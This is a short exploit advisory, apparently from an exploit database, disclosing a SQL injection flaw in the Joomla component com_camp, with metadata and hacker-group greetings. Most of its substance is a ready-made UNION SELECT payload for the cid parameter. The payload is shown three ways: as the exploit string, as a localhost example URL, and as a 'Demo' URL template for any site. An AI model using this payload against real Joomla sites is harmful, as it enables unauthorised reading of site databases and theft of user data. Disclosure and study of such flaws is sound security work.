Joomla! Component com_camp - SQL Injection

Author: Kernel Security Group
type: webapps
platform: php
port: 
date_added: 2010-05-14 
date_updated: 2017-01-09 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

[+] Title : Joomla Component com_camp SQL Injection Vulnerability
[+] Author: Kernel Security Group
[+] Data  : 2010-05-15

[!]#####################################################################################################[!]

[+] Title     : Joomla Component com_camp SQL Injection Vulnerability
[+] Author    : Kernel Security Group By D3v1l.blackhat
[+] Homepage  : http://www.KernelSec.com
[+] Email     : Info@KernelSec.com

[!]#####################################################################################################[!]

[+] Vulnerable File :

http://127.0.0.1/index.php?option=com_camp&task=show&cid=[SQL]

[+] ExploiT         :

-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--

[+] Example         :

http://127.0.0.1/index.php?option=com_camp&task=show&cid=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--

[+] Demo            :

http://[site]/index.php?option=com_camp&task=show&cid=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--


[!]#####################################################################################################[!]

[+] Special Thanks To My Best FriendS :

Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS

[+] IRANIAN Young HackerZ

[+] GreetZ : Exploit-DB TeaM

[!]#####################################################################################################[!]